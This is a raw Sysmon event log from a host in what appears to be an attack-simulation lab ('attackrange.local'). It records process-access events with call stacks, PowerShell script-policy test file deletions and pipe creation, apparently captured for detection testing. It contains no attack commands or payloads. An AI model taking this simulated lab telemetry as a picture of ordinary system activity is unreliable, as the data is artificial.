22:55:47.174{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.168{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001697734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:47.146{05ADC7E1-70F3-603D-7A88-00000000AD01}8468\PSHost.132591129470358513.8468.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.130{05ADC7E1-70F3-603D-7A88-00000000AD01}8468ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fnuwhgbc.esd.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.130{05ADC7E1-70F3-603D-7A88-00000000AD01}8468ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_eqilgg0y.tyq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.115{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_eqilgg0y.tyq.ps12021-03-01 22:55:47.115 10341000x80000000000000001697730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.115{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F3-603D-7B88-00000000AD01}5240C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.115{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.115{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 